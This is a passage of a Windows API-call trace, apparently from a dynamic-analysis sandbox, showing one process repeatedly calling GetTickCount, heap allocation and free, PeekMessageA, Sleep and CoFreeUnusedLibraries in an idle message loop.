[0066.414] GetTickCount () returned 0x1d21d [0066.414] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.414] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.414] GetTickCount () returned 0x1d21d [0066.414] Sleep (dwMilliseconds=0x0) [0066.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.414] GetLastError () returned 0x0 [0066.414] GetCurrentProcessId () returned 0xa44 [0066.414] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.414] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.414] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.414] GetTickCount () returned 0x1d21d [0066.414] GetTickCount () returned 0x1d21d [0066.415] GetTickCount () returned 0x1d21d [0066.415] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.415] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.415] GetTickCount () returned 0x1d21d [0066.415] Sleep (dwMilliseconds=0x0) [0066.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.415] GetLastError () returned 0x0 [0066.415] GetCurrentProcessId () returned 0xa44 [0066.415] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.415] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.415] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.415] GetTickCount () returned 0x1d21d [0066.415] GetTickCount () returned 0x1d21d [0066.415] GetTickCount () returned 0x1d21d [0066.415] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.415] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.415] GetTickCount () returned 0x1d21d [0066.415] Sleep (dwMilliseconds=0x0) [0066.415] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.416] GetLastError () returned 0x0 [0066.416] GetCurrentProcessId () returned 0xa44 [0066.416] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.416] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.416] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.416] GetTickCount () returned 0x1d21d [0066.416] GetTickCount () returned 0x1d21d [0066.416] GetTickCount () returned 0x1d21d [0066.416] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.416] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.416] GetTickCount () returned 0x1d21d [0066.416] Sleep (dwMilliseconds=0x0) [0066.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0066.416] GetLastError () returned 0x0 [0066.416] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.416] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.416] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.416] GetTickCount () returned 0x1d21d [0066.416] GetTickCount () returned 0x1d21d [0066.416] CoFreeUnusedLibraries () [0066.416] GetTickCount () returned 0x1d21d [0066.416] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.417] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.417] GetTickCount () returned 0x1d21d [0066.417] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.417] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.417] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.417] GetTickCount () returned 0x1d21d [0066.417] GetTickCount () returned 0x1d21d [0066.417] CoFreeUnusedLibraries () [0066.417] GetTickCount () returned 0x1d21d [0066.417] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.417] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.417] GetTickCount () returned 0x1d21d [0066.417] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.417] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.417] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.417] GetTickCount () returned 0x1d21d [0066.417] GetTickCount () returned 0x1d21d [0066.417] CoFreeUnusedLibraries () [0066.417] GetTickCount () returned 0x1d21d [0066.417] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.417] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.418] GetTickCount () returned 0x1d21d [0066.418] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.418] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.418] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.418] GetTickCount () returned 0x1d21d [0066.418] GetTickCount () returned 0x1d21d [0066.418] CoFreeUnusedLibraries () [0066.418] GetTickCount () returned 0x1d21d [0066.418] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.418] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.418] GetTickCount () returned 0x1d21d [0066.418] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.418] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.418] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.418] GetTickCount () returned 0x1d21d [0066.418] GetTickCount () returned 0x1d21d [0066.418] CoFreeUnusedLibraries () [0066.418] GetTickCount () returned 0x1d21d [0066.419] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.419] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.419] GetTickCount () returned 0x1d21d [0066.419] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.419] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.419] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.419] GetTickCount () returned 0x1d21d [0066.419] GetTickCount () returned 0x1d21d [0066.419] CoFreeUnusedLibraries () [0066.419] GetTickCount () returned 0x1d21d [0066.419] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.419] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.419] GetTickCount () returned 0x1d21d [0066.419] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.419] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.419] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.419] GetTickCount () returned 0x1d21d [0066.419] GetTickCount () returned 0x1d21d [0066.420] CoFreeUnusedLibraries () [0066.420] GetTickCount () returned 0x1d21d [0066.420] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.420] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.420] GetTickCount () returned 0x1d21d [0066.420] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.420] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.420] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.420] GetTickCount () returned 0x1d21d [0066.420] GetTickCount () returned 0x1d21d [0066.420] CoFreeUnusedLibraries () [0066.420] GetTickCount () returned 0x1d21d [0066.420] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.420] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.420] GetTickCount () returned 0x1d21d [0066.420] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.420] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.421] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.421] GetTickCount () returned 0x1d21d [0066.421] GetTickCount () returned 0x1d21d [0066.421] CoFreeUnusedLibraries () [0066.421] GetTickCount () returned 0x1d21d [0066.421] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.421] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.421] GetTickCount () returned 0x1d21d [0066.421] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.421] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.421] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.421] GetTickCount () returned 0x1d21d [0066.421] GetTickCount () returned 0x1d21d [0066.421] CoFreeUnusedLibraries () [0066.421] GetTickCount () returned 0x1d21d [0066.421] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.421] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.421] GetTickCount () returned 0x1d21d [0066.421] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.422] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.422] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.422] GetTickCount () returned 0x1d21d [0066.422] GetTickCount () returned 0x1d21d [0066.422] CoFreeUnusedLibraries () [0066.422] GetTickCount () returned 0x1d22c [0066.422] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.422] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.422] GetTickCount () returned 0x1d22c [0066.422] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.422] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.422] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.422] GetTickCount () returned 0x1d22c [0066.422] GetTickCount () returned 0x1d22c [0066.422] CoFreeUnusedLibraries () [0066.422] GetTickCount () returned 0x1d22c [0066.422] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.422] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.422] GetTickCount () returned 0x1d22c [0066.423] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.423] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.423] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.423] GetTickCount () returned 0x1d22c [0066.423] GetTickCount () returned 0x1d22c [0066.423] CoFreeUnusedLibraries () [0066.423] GetTickCount () returned 0x1d22c [0066.423] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.423] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.423] GetTickCount () returned 0x1d22c [0066.423] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.423] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.423] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.423] GetTickCount () returned 0x1d22c [0066.423] GetTickCount () returned 0x1d22c [0066.423] CoFreeUnusedLibraries () [0066.423] GetTickCount () returned 0x1d22c [0066.423] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.423] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.423] GetTickCount () returned 0x1d22c [0066.423] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.423] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.423] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.424] GetTickCount () returned 0x1d22c [0066.424] GetTickCount () returned 0x1d22c [0066.424] CoFreeUnusedLibraries () [0066.424] GetTickCount () returned 0x1d22c [0066.424] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.424] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.424] GetTickCount () returned 0x1d22c [0066.424] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.424] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.424] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.424] GetTickCount () returned 0x1d22c [0066.424] GetTickCount () returned 0x1d22c [0066.424] CoFreeUnusedLibraries () [0066.424] GetTickCount () returned 0x1d22c [0066.424] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.424] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.424] GetTickCount () returned 0x1d22c [0066.424] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.424] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.424] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.424] GetTickCount () returned 0x1d22c [0066.424] GetTickCount () returned 0x1d22c [0066.424] CoFreeUnusedLibraries () [0066.424] GetTickCount () returned 0x1d22c [0066.424] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.425] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.425] GetTickCount () returned 0x1d22c [0066.425] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.425] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.425] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.425] GetTickCount () returned 0x1d22c [0066.425] GetTickCount () returned 0x1d22c [0066.425] CoFreeUnusedLibraries () [0066.425] GetTickCount () returned 0x1d22c [0066.425] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.425] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.425] GetTickCount () returned 0x1d22c [0066.425] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.425] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.425] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.425] GetTickCount () returned 0x1d22c [0066.425] GetTickCount () returned 0x1d22c [0066.425] CoFreeUnusedLibraries () [0066.425] GetTickCount () returned 0x1d22c [0066.425] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.425] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.425] GetTickCount () returned 0x1d22c [0066.426] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.426] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.426] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.426] GetTickCount () returned 0x1d22c [0066.426] GetTickCount () returned 0x1d22c [0066.426] CoFreeUnusedLibraries () [0066.426] GetTickCount () returned 0x1d22c [0066.426] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.426] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.426] GetTickCount () returned 0x1d22c [0066.426] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.426] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.426] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.426] GetTickCount () returned 0x1d22c [0066.426] GetTickCount () returned 0x1d22c [0066.426] CoFreeUnusedLibraries () [0066.426] GetTickCount () returned 0x1d22c [0066.426] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.426] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.426] GetTickCount () returned 0x1d22c [0066.427] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.427] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.427] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.427] GetTickCount () returned 0x1d22c [0066.427] GetTickCount () returned 0x1d22c [0066.427] CoFreeUnusedLibraries () [0066.427] GetTickCount () returned 0x1d22c [0066.427] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.427] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.427] GetTickCount () returned 0x1d22c [0066.427] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.427] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.427] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.427] GetTickCount () returned 0x1d22c [0066.427] GetTickCount () returned 0x1d22c [0066.427] CoFreeUnusedLibraries () [0066.427] GetTickCount () returned 0x1d22c [0066.427] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.427] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.427] GetTickCount () returned 0x1d22c [0066.427] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.428] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.428] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.428] GetTickCount () returned 0x1d22c [0066.428] GetTickCount () returned 0x1d22c [0066.428] CoFreeUnusedLibraries () [0066.428] GetTickCount () returned 0x1d22c [0066.428] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.428] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.428] GetTickCount () returned 0x1d22c [0066.428] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.428] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.428] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.428] GetTickCount () returned 0x1d22c [0066.428] GetTickCount () returned 0x1d22c [0066.428] CoFreeUnusedLibraries () [0066.428] GetTickCount () returned 0x1d22c [0066.428] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.428] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.428] GetTickCount () returned 0x1d22c [0066.428] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.428] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.428] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.429] GetTickCount () returned 0x1d22c [0066.429] GetTickCount () returned 0x1d22c [0066.429] CoFreeUnusedLibraries () [0066.429] GetTickCount () returned 0x1d22c [0066.429] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.429] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.429] GetTickCount () returned 0x1d22c [0066.429] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.429] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.429] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.429] GetTickCount () returned 0x1d22c [0066.429] GetTickCount () returned 0x1d22c [0066.429] CoFreeUnusedLibraries () [0066.429] GetTickCount () returned 0x1d22c [0066.429] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.429] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.429] GetTickCount () returned 0x1d22c [0066.429] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.429] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.429] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.429] GetTickCount () returned 0x1d22c [0066.429] GetTickCount () returned 0x1d22c [0066.429] CoFreeUnusedLibraries () [0066.429] GetTickCount () returned 0x1d22c [0066.429] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.429] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.430] GetTickCount () returned 0x1d22c [0066.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.430] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.430] GetTickCount () returned 0x1d22c [0066.430] GetTickCount () returned 0x1d22c [0066.430] CoFreeUnusedLibraries () [0066.430] GetTickCount () returned 0x1d22c [0066.430] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.430] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.430] GetTickCount () returned 0x1d22c [0066.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.430] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.430] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 